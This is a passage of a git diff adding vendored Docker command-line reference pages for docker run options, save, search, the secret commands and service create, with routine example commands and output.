Feb 9 16:05 /dev/nulo + +It is often necessary to directly expose devices to a container. The `--device` +option enables that. For example, a specific block storage device or loop +device or audio device can be added to an otherwise unprivileged container +(without the `--privileged` flag) and have the application directly access it. + +By default, the container will be able to `read`, `write` and `mknod` these devices. +This can be overridden using a third `:rwm` set of options to each `--device` +flag: + + + $ docker run --device=/dev/sda:/dev/xvdc --rm -it ubuntu fdisk /dev/xvdc + + Command (m for help): q + $ docker run --device=/dev/sda:/dev/xvdc:r --rm -it ubuntu fdisk /dev/xvdc + You will not be able to write the partition table. + + Command (m for help): q + + $ docker run --device=/dev/sda:/dev/xvdc:rw --rm -it ubuntu fdisk /dev/xvdc + + Command (m for help): q + + $ docker run --device=/dev/sda:/dev/xvdc:m --rm -it ubuntu fdisk /dev/xvdc + fdisk: unable to open /dev/xvdc: Operation not permitted + +> **Note:** +> `--device` cannot be safely used with ephemeral devices. Block devices +> that may be removed should not be added to untrusted containers with +> `--device`. + +### Restart policies (--restart) + +Use Docker's `--restart` to specify a container's *restart policy*. A restart +policy controls whether the Docker daemon restarts a container after exit. +Docker supports the following restart policies: + + + + + + + + + + + + + + + + + + + + + + + + + + +
PolicyResult
no + Do not automatically restart the container when it exits. This is the + default. +
+ + on-failure[:max-retries] + + + Restart only if the container exits with a non-zero exit status. + Optionally, limit the number of restart retries the Docker + daemon attempts. +
always + Always restart the container regardless of the exit status. + When you specify always, the Docker daemon will try to restart + the container indefinitely. The container will also always start + on daemon startup, regardless of the current state of the container. +
unless-stopped + Always restart the container regardless of the exit status, but + do not start it on daemon startup if the container has been put + to a stopped state before. +
+ + $ docker run --restart=always redis + +This will run the `redis` container with a restart policy of **always** +so that if the container exits, Docker will restart it. + +More detailed information on restart policies can be found in the +[Restart Policies (--restart)](../run.md#restart-policies-restart) +section of the Docker run reference page. + +### Add entries to container hosts file (--add-host) + +You can add other hosts into a container's `/etc/hosts` file by using one or +more `--add-host` flags. This example adds a static address for a host named +`docker`: + + $ docker run --add-host=docker:10.180.0.1 --rm -it debian + root@f38c87f2a42d:/# ping docker + PING docker (10.180.0.1): 48 data bytes + 56 bytes from 10.180.0.1: icmp_seq=0 ttl=254 time=7.600 ms + 56 bytes from 10.180.0.1: icmp_seq=1 ttl=254 time=30.705 ms + ^C--- docker ping statistics --- + 2 packets transmitted, 2 packets received, 0% packet loss + round-trip min/avg/max/stddev = 7.600/19.152/30.705/11.553 ms + +Sometimes you need to connect to the Docker host from within your +container. To enable this, pass the Docker host's IP address to +the container using the `--add-host` flag. To find the host's address, +use the `ip addr show` command. + +The flags you pass to `ip addr show` depend on whether you are +using IPv4 or IPv6 networking in your containers. Use the following +flags for IPv4 address retrieval for a network device named `eth0`: + + $ HOSTIP=`ip -4 addr show scope global dev eth0 | grep inet | awk '{print \$2}' | cut -d / -f 1` + $ docker run --add-host=docker:${HOSTIP} --rm -it debian + +For IPv6 use the `-6` flag instead of the `-4` flag. For other network +devices, replace `eth0` with the correct device name (for example `docker0` +for the bridge device). + +### Set ulimits in container (--ulimit) + +Since setting `ulimit` settings in a container requires extra privileges not +available in the default container, you can set these using the `--ulimit` flag. +`--ulimit` is specified with a soft and hard limit as such: +`=[:]`, for example: + + $ docker run --ulimit nofile=1024:1024 --rm debian sh -c "ulimit -n" + 1024 + +> **Note:** +> If you do not provide a `hard limit`, the `soft limit` will be used +> for both values. If no `ulimits` are set, they will be inherited from +> the default `ulimits` set on the daemon. `as` option is disabled now. +> In other words, the following script is not supported: +> `$ docker run -it --ulimit as=1024 fedora /bin/bash` + +The values are sent to the appropriate `syscall` as they are set. +Docker doesn't perform any byte conversion. Take this into account when setting the values. + +#### For `nproc` usage + +Be careful setting `nproc` with the `ulimit` flag as `nproc` is designed by Linux to set the +maximum number of processes available to a user, not to a container. For example, start four +containers with `daemon` user: + + docker run -d -u daemon --ulimit nproc=3 busybox top + docker run -d -u daemon --ulimit nproc=3 busybox top + docker run -d -u daemon --ulimit nproc=3 busybox top + docker run -d -u daemon --ulimit nproc=3 busybox top + +The 4th container fails and reports "[8] System error: resource temporarily unavailable" error. +This fails because the caller set `nproc=3` resulting in the first three containers using up +the three processes quota set for the `daemon` user. + +### Stop container with signal (--stop-signal) + +The `--stop-signal` flag sets the system call signal that will be sent to the container to exit. +This signal can be a valid unsigned number that matches a position in the kernel's syscall table, for instance 9, +or a signal name in the format SIGNAME, for instance SIGKILL. + +### Optional security options (--security-opt) + +On Windows, this flag can be used to specify the `credentialspec` option. +The `credentialspec` must be in the format `file://spec.txt` or `registry://keyname`. + +### Stop container with timeout (--stop-timeout) + +The `--stop-timeout` flag sets the timeout (in seconds) that a pre-defined (see `--stop-signal`) system call +signal that will be sent to the container to exit. After timeout elapses the container will be killed with SIGKILL. + +### Specify isolation technology for container (--isolation) + +This option is useful in situations where you are running Docker containers on +Microsoft Windows. The `--isolation ` option sets a container's isolation +technology. On Linux, the only supported is the `default` option which uses +Linux namespaces. These two commands are equivalent on Linux: + +``` +$ docker run -d busybox top +$ docker run -d --isolation default busybox top +``` + +On Microsoft Windows, can take any of these values: + + +| Value | Description | +|-----------|---------------------------------------------------------------------------------------------------------------------------------------------------------------| +| `default` | Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value. | +| `process` | Namespace isolation only. | +| `hyperv` | Hyper-V hypervisor partition-based isolation. | + +On Windows, the default isolation for client is `hyperv`, and for server is +`process`. Therefore when running on Windows server without a `daemon` option +set, these two commands are equivalent: +``` +$ docker run -d --isolation default busybox top +$ docker run -d --isolation process busybox top +``` + +If you have set the `--exec-opt isolation=hyperv` option on the Docker `daemon`, +if running on Windows server, any of these commands also result in `hyperv` isolation: + +``` +$ docker run -d --isolation default busybox top +$ docker run -d --isolation hyperv busybox top +``` + +### Configure namespaced kernel parameters (sysctls) at runtime + +The `--sysctl` sets namespaced kernel parameters (sysctls) in the +container. For example, to turn on IP forwarding in the containers +network namespace, run this command: + + $ docker run --sysctl net.ipv4.ip_forward=1 someimage + + +> **Note**: Not all sysctls are namespaced. Docker does not support changing sysctls +> inside of a container that also modify the host system. As the kernel +> evolves we expect to see more sysctls become namespaced. + +#### Currently supported sysctls + + `IPC Namespace`: + + kernel.msgmax, kernel.msgmnb, kernel.msgmni, kernel.sem, kernel.shmall, kernel.shmmax, kernel.shmmni, kernel.shm_rmid_forced + Sysctls beginning with fs.mqueue.* + + If you use the `--ipc=host` option these sysctls will not be allowed. + + `Network Namespace`: + Sysctls beginning with net.* + + If you use the `--network=host` option using these sysctls will not be allowed. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/save.md b/vendor/github.com/docker/docker/docs/reference/commandline/save.md new file mode 100644 index 0000000000..88a5fed103 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/save.md @@ -0,0 +1,45 @@ +--- +title: "save" +description: "The save command description and usage" +keywords: "tarred, repository, backup" +--- + + + +# save + +```markdown +Usage: docker save [OPTIONS] IMAGE [IMAGE...] + +Save one or more images to a tar archive (streamed to STDOUT by default) + +Options: + --help Print usage + -o, --output string Write to a file, instead of STDOUT +``` + +Produces a tarred repository to the standard output stream. +Contains all parent layers, and all tags + versions, or specified `repo:tag`, for +each argument provided. + +It is used to create a backup that can then be used with `docker load` + + $ docker save busybox > busybox.tar + $ ls -sh busybox.tar + 2.7M busybox.tar + $ docker save --output busybox.tar busybox + $ ls -sh busybox.tar + 2.7M busybox.tar + $ docker save -o fedora-all.tar fedora + $ docker save -o fedora-latest.tar fedora:latest + +It is even useful to cherry-pick particular tags of an image repository + + $ docker save -o ubuntu.tar ubuntu:lucid ubuntu:saucy diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/search.md b/vendor/github.com/docker/docker/docs/reference/commandline/search.md new file mode 100644 index 0000000000..31faf37375 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/search.md @@ -0,0 +1,134 @@ +--- +title: "search" +description: "The search command description and usage" +keywords: "search, hub, images" +--- + + + +# search + +```markdown +Usage: docker search [OPTIONS] TERM + +Search the Docker Hub for images + +Options: + -f, --filter value Filter output based on conditions provided (default []) + - is-automated=(true|false) + - is-official=(true|false) + - stars= - image has at least 'number' stars + --help Print usage + --limit int Max number of search results (default 25) + --no-trunc Don't truncate output +``` + +Search [Docker Hub](https://hub.docker.com) for images + +See [*Find Public Images on Docker Hub*](https://docs.docker.com/engine/tutorials/dockerrepos/#searching-for-images) for +more details on finding shared images from the command line. + +> **Note:** +> Search queries will only return up to 25 results + +## Examples + +### Search images by name + +This example displays images with a name containing 'busybox': + + $ docker search busybox + NAME DESCRIPTION STARS OFFICIAL AUTOMATED + busybox Busybox base image. 316 [OK] + progrium/busybox 50 [OK] + radial/busyboxplus Full-chain, Internet enabled, busybox made... 8 [OK] + odise/busybox-python 2 [OK] + azukiapp/busybox This image is meant to be used as the base... 2 [OK] + ofayau/busybox-jvm Prepare busybox to install a 32 bits JVM. 1 [OK] + shingonoide/archlinux-busybox Arch Linux, a lightweight and flexible Lin... 1 [OK] + odise/busybox-curl 1 [OK] + ofayau/busybox-libc32 Busybox with 32 bits (and 64 bits) libs 1 [OK] + peelsky/zulu-openjdk-busybox 1 [OK] + skomma/busybox-data Docker image suitable for data volume cont... 1 [OK] + elektritter/busybox-teamspeak Lightweight teamspeak3 container based on... 1 [OK] + socketplane/busybox 1 [OK] + oveits/docker-nginx-busybox This is a tiny NginX docker image based on... 0 [OK] + ggtools/busybox-ubuntu Busybox ubuntu version with extra goodies 0 [OK] + nikfoundas/busybox-confd Minimal busybox based distribution of confd 0 [OK] + openshift/busybox-http-app 0 [OK] + jllopis/busybox 0 [OK] + swyckoff/busybox 0 [OK] + powellquiring/busybox 0 [OK] + williamyeh/busybox-sh Docker image for BusyBox's sh 0 [OK] + simplexsys/busybox-cli-powered Docker busybox images, with a few often us... 0 [OK] + fhisamoto/busybox-java Busybox java 0 [OK] + scottabernethy/busybox 0 [OK] + marclop/busybox-solr + +### Display non-truncated description (--no-trunc) + +This example displays images with a name containing 'busybox', +at least 3 stars and the description isn't truncated in the output: + + $ docker search --stars=3 --no-trunc busybox + NAME DESCRIPTION STARS OFFICIAL AUTOMATED + busybox Busybox base image. 325 [OK] + progrium/busybox 50 [OK] + radial/busyboxplus Full-chain, Internet enabled, busybox made from scratch. Comes in git and cURL flavors. 8 [OK] + +## Limit search results (--limit) + +The flag `--limit` is the maximum number of results returned by a search. This value could +be in the range between 1 and 100. The default value of `--limit` is 25. + + +## Filtering + +The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there is more +than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`) + +The currently supported filters are: + +* stars (int - number of stars the image has) +* is-automated (true|false) - is the image automated or not +* is-official (true|false) - is the image official or not + + +### stars + +This example displays images with a name containing 'busybox' and at +least 3 stars: + + $ docker search --filter stars=3 busybox + NAME DESCRIPTION STARS OFFICIAL AUTOMATED + busybox Busybox base image. 325 [OK] + progrium/busybox 50 [OK] + radial/busyboxplus Full-chain, Internet enabled, busybox made... 8 [OK] + + +### is-automated + +This example displays images with a name containing 'busybox' +and are automated builds: + + $ docker search --filter is-automated busybox + NAME DESCRIPTION STARS OFFICIAL AUTOMATED + progrium/busybox 50 [OK] + radial/busyboxplus Full-chain, Internet enabled, busybox made... 8 [OK] + +### is-official + +This example displays images with a name containing 'busybox', at least +3 stars and are official builds: + + $ docker search --filter "is-official=true" --filter "stars=3" busybox + NAME DESCRIPTION STARS OFFICIAL AUTOMATED + progrium/busybox 50 [OK] + radial/busyboxplus Full-chain, Internet enabled, busybox made... 8 [OK] diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/secret_create.md b/vendor/github.com/docker/docker/docs/reference/commandline/secret_create.md new file mode 100644 index 0000000000..aebcebbcdd --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/secret_create.md @@ -0,0 +1,90 @@ +--- +title: "secret create" +description: "The secret create command description and usage" +keywords: ["secret, create"] +--- + + + +# secret create + +```Markdown +Usage: docker secret create [OPTIONS] SECRET file|- + +Create a secret from a file or STDIN as content + +Options: + --help Print usage + -l, --label list Secret labels (default []) +``` + +Creates a secret using standard input or from a file for the secret content. You must run this +command on a manager node. + +## Examples + +### Create a secret + +```bash +$ echo | docker secret create my_secret - +mhv17xfe3gh6xc4rij5orpfds + +$ docker secret ls +ID NAME CREATED UPDATED SIZE +mhv17xfe3gh6xc4rij5orpfds my_secret 2016-10-27 23:25:43.909181089 +0000 UTC 2016-10-27 23:25:43.909181089 +0000 UTC 1679 +``` + +### Create a secret with a file + +```bash +$ docker secret create my_secret ./secret.json +mhv17xfe3gh6xc4rij5orpfds + +$ docker secret ls +ID NAME CREATED UPDATED SIZE +mhv17xfe3gh6xc4rij5orpfds my_secret 2016-10-27 23:25:43.909181089 +0000 UTC 2016-10-27 23:25:43.909181089 +0000 UTC 1679 +``` + +### Create a secret with labels + +```bash +$ docker secret create --label env=dev --label rev=20161102 my_secret ./secret.json +jtn7g6aukl5ky7nr9gvwafoxh + +$ docker secret inspect my_secret +[ + { + "ID": "jtn7g6aukl5ky7nr9gvwafoxh", + "Version": { + "Index": 541 + }, + "CreatedAt": "2016-11-03T20:54:12.924766548Z", + "UpdatedAt": "2016-11-03T20:54:12.924766548Z", + "Spec": { + "Name": "my_secret", + "Labels": { + "env": "dev", + "rev": "20161102" + }, + "Data": null + }, + "Digest": "sha256:4212a44b14e94154359569333d3fc6a80f6b9959dfdaff26412f4b2796b1f387", + "SecretSize": 1679 + } +] + +``` + + +## Related information + +* [secret inspect](secret_inspect.md) +* [secret ls](secret_ls.md) +* [secret rm](secret_rm.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/secret_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/secret_inspect.md new file mode 100644 index 0000000000..de878f74e4 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/secret_inspect.md @@ -0,0 +1,85 @@ +--- +title: "secret inspect" +description: "The secret inspect command description and usage" +keywords: ["secret, inspect"] +--- + + + +# secret inspect + +```Markdown +Usage: docker secret inspect [OPTIONS] SECRET [SECRET...] + +Display detailed information on one or more secrets + +Options: + -f, --format string Format the output using the given Go template + --help Print usage +``` + + +Inspects the specified secret. This command has to be run targeting a manager +node. + +By default, this renders all results in a JSON array. If a format is specified, +the given template will be executed for each result. + +Go's [text/template](http://golang.org/pkg/text/template/) package +describes all the details of the format. + +## Examples + +### Inspecting a secret by name or ID + +You can inspect a secret, either by its *name*, or *ID* + +For example, given the following secret: + +```bash +$ docker secret ls +ID NAME CREATED UPDATED +mhv17xfe3gh6xc4rij5orpfds secret.json 2016-10-27 23:25:43.909181089 +0000 UTC 2016-10-27 23:25:43.909181089 +0000 UTC +``` + +```bash +$ docker secret inspect secret.json +[ + { + "ID": "mhv17xfe3gh6xc4rij5orpfds", + "Version": { + "Index": 1198 + }, + "CreatedAt": "2016-10-27T23:25:43.909181089Z", + "UpdatedAt": "2016-10-27T23:25:43.909181089Z", + "Spec": { + "Name": "secret.json" + } + } +] +``` + +### Formatting secret output + +You can use the --format option to obtain specific information about a +secret. The following example command outputs the creation time of the +secret. + +```bash{% raw %} +$ docker secret inspect --format='{{.CreatedAt}}' mhv17xfe3gh6xc4rij5orpfds +2016-10-27 23:25:43.909181089 +0000 UTC +{% endraw %}``` + + +## Related information + +* [secret create](secret_create.md) +* [secret ls](secret_ls.md) +* [secret rm](secret_rm.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/secret_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/secret_ls.md new file mode 100644 index 0000000000..6b34fc2146 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/secret_ls.md @@ -0,0 +1,43 @@ +--- +title: "secret ls" +description: "The secret ls command description and usage" +keywords: ["secret, ls"] +--- + + + +# secret ls + +```Markdown +Usage: docker secret ls [OPTIONS] + +List secrets + +Aliases: + ls, list + +Options: + -q, --quiet Only display IDs +``` + +Run this command on a manager node to list the secrets in the Swarm. + +## Examples + +```bash +$ docker secret ls +ID NAME CREATED UPDATED +mhv17xfe3gh6xc4rij5orpfds secret.json 2016-10-27 23:25:43.909181089 +0000 UTC 2016-10-27 23:25:43.909181089 +0000 UTC +``` +## Related information + +* [secret create](secret_create.md) +* [secret inspect](secret_inspect.md) +* [secret rm](secret_rm.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/secret_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/secret_rm.md new file mode 100644 index 0000000000..f504b1ba4f --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/secret_rm.md @@ -0,0 +1,48 @@ +--- +title: "secret rm" +description: "The secret rm command description and usage" +keywords: ["secret, rm"] +--- + + + +# secret rm + +```Markdown +Usage: docker secret rm SECRET [SECRET...] + +Remove one or more secrets + +Aliases: + rm, remove + +Options: + --help Print usage +``` + +Removes the specified secrets from the swarm. This command has to be run +targeting a manager node. + +This example removes a secret: + +```bash +$ docker secret rm secret.json +sapth4csdo5b6wz2p5uimh5xg +``` + +> **Warning**: Unlike `docker rm`, this command does not ask for confirmation +> before removing a secret. + + +## Related information + +* [secret create](secret_create.md) +* [secret inspect](secret_inspect.md) +* [secret ls](secret_ls.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_create.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_create.md new file mode 100644 index 0000000000..c9e298096b --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/service_create.md @@ -0,0 +1,556 @@ +--- +title: "service create" +description: "The service create command description and usage" +keywords: "service, create" +--- + + + +# service create + +```Markdown +Usage: docker service create [OPTIONS] IMAGE [COMMAND] [ARG...] + +Create a new service + +Options: + --constraint list Placement constraints (default []) + --container-label list Container labels (default []) + --dns list Set custom DNS servers (default []) + --dns-option list Set DNS options (default []) + --dns-search list Set custom DNS search domains (default []) + --endpoint-mode string Endpoint mode (vip or dnsrr) + -e, --env list Set environment variables (default []) + --env-file list Read in a file of environment variables (default []) + --group list Set one or more supplementary user groups for the container (default []) + --health-cmd string Command to run to check health + --health-interval duration Time between running the check (ns|us|ms|s|m|h) + --health-retries int Consecutive failures needed to report unhealthy + --health-timeout duration Maximum time to allow one check to run (ns|us|ms|s|m|h) + --help Print usage + --host list Set one or more custom host-to-IP mappings (host:ip) (default []) + --hostname string Container hostname + -l, --label list Service labels (default []) + --limit-cpu decimal Limit CPUs (default 0.000) + --limit-memory bytes Limit Memory (default 0 B) + --log-driver string Logging driver for service + --log-opt list Logging driver options (default []) + --mode string Service mode (replicated or global) (default "replicated") + --mount mount Attach a filesystem mount to the service + --name string Service name + --network list Network attachments (default []) + --no-healthcheck Disable any container-specified HEALTHCHECK + -p, --publish port Publish a port as a node port + --replicas uint Number of tasks + --reserve-cpu decimal Reserve CPUs (default 0.000) + --reserve-memory bytes Reserve Memory (default 0 B) + --restart-condition string Restart when condition is met (none, on-failure, or any) + --restart-delay duration Delay between restart attempts (ns|us|ms|s|m|h) + --restart-max-attempts uint Maximum number of restarts before giving up + --restart-window duration Window used to evaluate the restart policy (ns|us|ms|s|m|h) + --secret secret Specify secrets to expose to the service + --stop-grace-period duration Time to wait before force killing a container (ns|us|ms|s|m|h) + -t, --tty Allocate a pseudo-TTY + --update-delay duration Delay between updates (ns|us|ms|s|m|h) (default 0s) + --update-failure-action string Action on update failure (pause|continue) (default "pause") + --update-max-failure-ratio float Failure rate to tolerate during an update + --update-monitor duration Duration after each task update to monitor for failure (ns|us|ms|s|m|h) (default 0s) + --update-parallelism uint Maximum number of tasks updated simultaneously (0 to update all at once) (default 1) + -u, --user string Username or UID (format: [:]) + --with-registry-auth Send registry authentication details to swarm agents + -w, --workdir string Working directory inside the container +``` + +Creates a service as described by the specified parameters. You must run this +command on a manager node. + +## Examples + +### Create a service + +```bash +$ docker service create --name redis redis:3.0.6 +dmu1ept4cxcfe8k8lhtux3ro3 + +$ docker service create --mode global --name redis2 redis:3.0.6 +a8q9dasaafudfs8q8w32udass + +$ docker service ls +ID NAME MODE REPLICAS IMAGE +dmu1ept4cxcf redis replicated 1/1 redis:3.0.6 +a8q9dasaafud redis2 global 1/1 redis:3.0.6 +``` + +### Create a service with 5 replica tasks (--replicas) + +Use the `--replicas` flag to set the number of replica tasks for a replicated +service. The following command creates a `redis` service with `5` replica tasks: + +```bash +$ docker service create --name redis --replicas=5 redis:3.0.6 +4cdgfyky7ozwh3htjfw0d12qv +``` + +The above command sets the *desired* number of tasks for the service. Even +though the command returns immediately, actual scaling of the service may take +some time. The `REPLICAS` column shows both the *actual* and *desired* number +of replica tasks for the service. + +In the following example the desired state is `5` replicas, but the current +number of `RUNNING` tasks is `3`: + +```bash +$ docker service ls +ID NAME MODE REPLICAS IMAGE +4cdgfyky7ozw redis replicated 3/5 redis:3.0.7 +``` + +Once all the tasks are created and `RUNNING`, the actual number of tasks is +equal to the desired number: + +```bash +$ docker service ls +ID NAME MODE REPLICAS IMAGE +4cdgfyky7ozw redis replicated 5/5 redis:3.0.7 +``` + +### Create a service with secrets +Use the `--secret` flag to give a container access to a +[secret](secret_create.md). + +Create a service specifying a secret: + +```bash +$ docker service create --name redis --secret secret.json redis:3.0.6 +4cdgfyky7ozwh3htjfw0d12qv +``` + +Create a service specifying the secret, target, user/group ID and mode: + +```bash +$ docker service create --name redis \ + --secret source=ssh-key,target=ssh \ + --secret source=app-key,target=app,uid=1000,gid=1001,mode=0400 \ + redis:3.0.6 +4cdgfyky7ozwh3htjfw0d12qv +``` + +Secrets are located in `/run/secrets` in the container. If no target is +specified, the name of the secret will be used as the in memory file in the +container. If a target is specified, that will be the filename. In the +example above, two files will be created: `/run/secrets/ssh` and +`/run/secrets/app` for each of the secret targets specified. + +### Create a service with a rolling update policy + +```bash +$ docker service create \ + --replicas 10 \ + --name redis \ + --update-delay 10s \ + --update-parallelism 2 \ + redis:3.0.6 +``` + +When you run a [service update](service_update.md), the scheduler updates a +maximum of 2 tasks at a time, with `10s` between updates. For more information, +refer to the [rolling updates +tutorial](https://docs.docker.com/engine/swarm/swarm-tutorial/rolling-update/). + +### Set environment variables (-e, --env) + +This sets environmental variables for all tasks in a service. For example: + +```bash +$ docker service create --name redis_2 --replicas 5 --env MYVAR=foo redis:3.0.6 +``` + +### Create a docker service with specific hostname (--hostname) + +This option sets the docker service containers hostname to a specific string. For example: +```bash +$ docker service create --name redis --hostname myredis redis:3.0.6 +``` +### Set metadata on a service (-l, --label) + +A label is a `key=value` pair that applies metadata to a service. To label a +service with two labels: + +```bash +$ docker service create \ + --name redis_2 \ + --label com.example.foo="bar" + --label bar=baz \ + redis:3.0.6 +``` + +For more information about labels, refer to [apply custom +metadata](https://docs.docker.com/engine/userguide/labels-custom-metadata/). + +### Add bind-mounts or volumes + +Docker supports two different kinds of mounts, which allow containers to read to +or write from files or directories on other containers or the host operating +system. These types are _data volumes_ (often referred to simply as volumes) and +_bind-mounts_. + +Additionally, Docker also supports tmpfs mounts. + +A **bind-mount** makes a file or directory on the host available to the +container it is mounted within. A bind-mount may be either read-only or +read-write. For example, a container might share its host's DNS information by +means of a bind-mount of the host's `/etc/resolv.conf` or a container might +write logs to its host's `/var/log/myContainerLogs` directory. If you use +bind-mounts and your host and containers have different notions of permissions, +access controls, or other such details, you will run into portability issues. + +A **named volume** is a mechanism for decoupling persistent data needed by your +container from the image used to create the container and from the host machine. +Named volumes are created and managed by Docker, and a named volume persists +even when no container is currently using it. Data in named volumes can be +shared between a container and the host machine, as well as between multiple +containers. Docker uses a _volume driver_ to create, manage, and mount volumes. +You can back up or restore volumes using Docker commands. + +A **tmpfs** mounts a tmpfs inside a container for volatile data. + +Consider a situation where your image starts a lightweight web server. You could +use that image as a base image, copy in your website's HTML files, and package +that into another image. Each time your website changed, you'd need to update +the new image and redeploy all of the containers serving your website. A better +solution is to store the website in a named volume which is attached to each of +your web server containers when they start. To update the website, you just +update the named volume. + +For more information about named volumes, see +[Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/). + +The following table describes options which apply to both bind-mounts and named +volumes in a service: + +| Option | Required | Description +|:-----------------------------------------|:--------------------------|:----------------------------------------------------------------------------------------- +| **type** | | The type of mount, can be either `volume`, `bind`, or `tmpfs`. Defaults to `volume` if no type is specified.

  • `volume`: mounts a [managed volume](volume_create.md) into the container.
  • `bind`: bind-mounts a directory or file from the host into the container.
  • `tmpfs`: mount a tmpfs in the container
+| **src** or **source** | for `type=bind` only |
  • `type=volume`: `src` is an optional way to specify the name of the volume (for example, `src=my-volume`). If the named volume does not exist, it is automatically created. If no `src` is specified, the volume is assigned a random name which is guaranteed to be unique on the host, but may not be unique cluster-wide. A randomly-named volume has the same lifecycle as its container and is destroyed when the *container* is destroyed (which is upon `service update`, or when scaling or re-balancing the service).
  • `type=bind`: `src` is required, and specifies an absolute path to the file or directory to bind-mount (for example, `src=/path/on/host/`). An error is produced if the file or directory does not exist.
  • `type=tmpfs`: `src` is not supported.
+| **dst** or **destination** or **target** | yes | Mount path inside the container, for example `/some/path/in/container/`. If the path does not exist in the container's filesystem, the Engine creates a directory at the specified location before mounting the volume or bind-mount. +| **readonly** or **ro** | | The Engine mounts binds and volumes `read-write` unless `readonly` option is given when mounting the bind or volume.

  • `true` or `1` or no value: Mounts the bind or volume read-only.
  • `false` or `0`: Mounts the bind or volume read-write.
+ +#### Bind Propagation + +Bind propagation refers to whether or not mounts created within a given +bind-mount or named volume can be propagated to replicas of that mount. Consider +a mount point `/mnt`, which is also mounted on `/tmp`. The propation settings +control whether a mount on `/tmp/a` would also be available on `/mnt/a`. Each +propagation setting has a recursive counterpoint. In the case of recursion, +consider that `/tmp/a` is also mounted as `/foo`. The propagation settings +control whether `/mnt/a` and/or `/tmp/a` would exist. + +The `bind-propagation` option defaults to `rprivate` for both bind-mounts and +volume mounts, and is only configurable for bind-mounts. In other words, named +volumes do not support bind propagation. + +- **`shared`**: Sub-mounts of the original mount are exposed to replica mounts, + and sub-mounts of replica mounts are also propagated to the + original mount. +- **`slave`**: similar to a shared mount, but only in one direction. If the + original mount exposes a sub-mount, the replica mount can see it. + However, if the replica mount exposes a sub-mount, the original + mount cannot see it. +- **`private`**: The mount is private. Sub-mounts within it are not exposed to + replica mounts, and sub-mounts of replica mounts are not + exposed to the original mount. +- **`rshared`**: The same as shared, but the propagation also extends to and from + mount points nested within any of the original or replica mount + points. +- **`rslave`**: The same as `slave`, but the propagation also extends to and from + mount points nested within any of the original or replica mount + points. +- **`rprivate`**: The default. The same as `private`, meaning that no mount points + anywhere within the original or replica mount points propagate + in either direction. + +For more information about bind propagation, see the +[Linux kernel documentation for shared subtree](https://www.kernel.org/doc/Documentation/filesystems/sharedsubtree.txt). + +#### Options for Named Volumes +The following options can only be used for named volumes (`type=volume`); + +| Option | Description +|:----------------------|:-------------------------------------------------------------------------------------------------------------------- +| **volume-driver** | Name of the volume-driver plugin to use for the volume. Defaults to ``"local"``, to use the local volume driver to create the volume if the volume does not exist. +| **volume-label** | One or more custom metadata ("labels") to apply to the volume upon creation. For example, `volume-label=mylabel=hello-world,my-other-label=hello-mars`. For more information about labels, refer to [apply custom metadata](https://docs.docker.com/engine/userguide/labels-custom-metadata/). +| **volume-nocopy** | By default, if you attach an empty volume to a container, and files or directories already existed at the mount-path in the container (`dst`), the Engine copies those files and directories into the volume, allowing the host to access them. Set `volume-nocopy` to disables copying files from the container's filesystem to the volume and mount the empty volume.

A value is optional:
  • `true` or `1`: Default if you do not provide a value. Disables copying.
  • `false` or `0`: Enables copying.
+| **volume-opt** | Options specific to a given volume driver, which will be passed to the driver when creating the volume. Options are provided as a comma-separated list of key/value pairs, for example, `volume-opt=some-option=some-value,some-other-option=some-other-value`. For available options for a given driver, refer to that driver's documentation. + +#### Options for tmpfs +The following options can only be used for tmpfs mounts (`type=tmpfs`); + +| Option | Description +|:----------------------|:-------------------------------------------------------------------------------------------------------------------- +| **tmpfs-size** | Size of the tmpfs mount in bytes. Unlimited by default in Linux. +| **tmpfs-mode** | File mode of the tmpfs in octal. (e.g. `"700"` or `"0700"`.) Defaults to ``"1777"`` in Linux. + +#### Differences between "--mount" and "--volume" + +The `--mount` flag supports most options that are supported by the `-v` +or `--volume` flag for `docker run`, with some important exceptions: + +- The `--mount` flag allows you to specify a volume driver and volume driver + options *per volume*, without creating the volumes in advance. In contrast, + `docker run` allows you to specify a single volume driver which is shared + by all volumes, using the `--volume-driver` flag. + +- The `--mount` flag allows you to specify custom metadata ("labels") for a volume, + before the volume is created. + +- When you use `--mount` with `type=bind`, the host-path must refer to an *existing* + path on the host. The path will not be created for you and the service will fail + with an error if the path does not exist. + +- The `--mount` flag does not allow you to relabel a volume with `Z` or `z` flags, + which are used for `selinux` labeling. + +#### Create a service using a named volume + +The following example creates a service that uses a named volume: + +```bash +$ docker service create \ + --name my-service \ + --replicas 3 \ + --mount type=volume,source=my-volume,destination=/path/in/container,volume-label="color=red",volume-label="shape=round" \ + nginx:alpine +``` + +For each replica of the service, the engine requests a volume named "my-volume" +from the default ("local") volume driver where the task is deployed. If the +volume does not exist, the engine creates a new volume and applies the "color" +and "shape" labels. + +When the task is started, the volume is mounted on `/path/in/container/` inside +the container. + +Be aware that the default ("local") volume is a locally scoped volume driver. +This means that depending on where a task is deployed, either that task gets a +*new* volume named "my-volume", or shares the same "my-volume" with other tasks +of the same service. Multiple containers writing to a single shared volume can +cause data corruption if the software running inside the container is not +designed to handle concurrent processes writing to the same location. Also take +into account that containers can be re-scheduled by the Swarm orchestrator and +be deployed on a different node. + +#### Create a service that uses an anonymous volume + +The following command creates a service with three replicas with an anonymous +volume on `/path/in/container`: + +```bash +$ docker service create \ + --name my-service 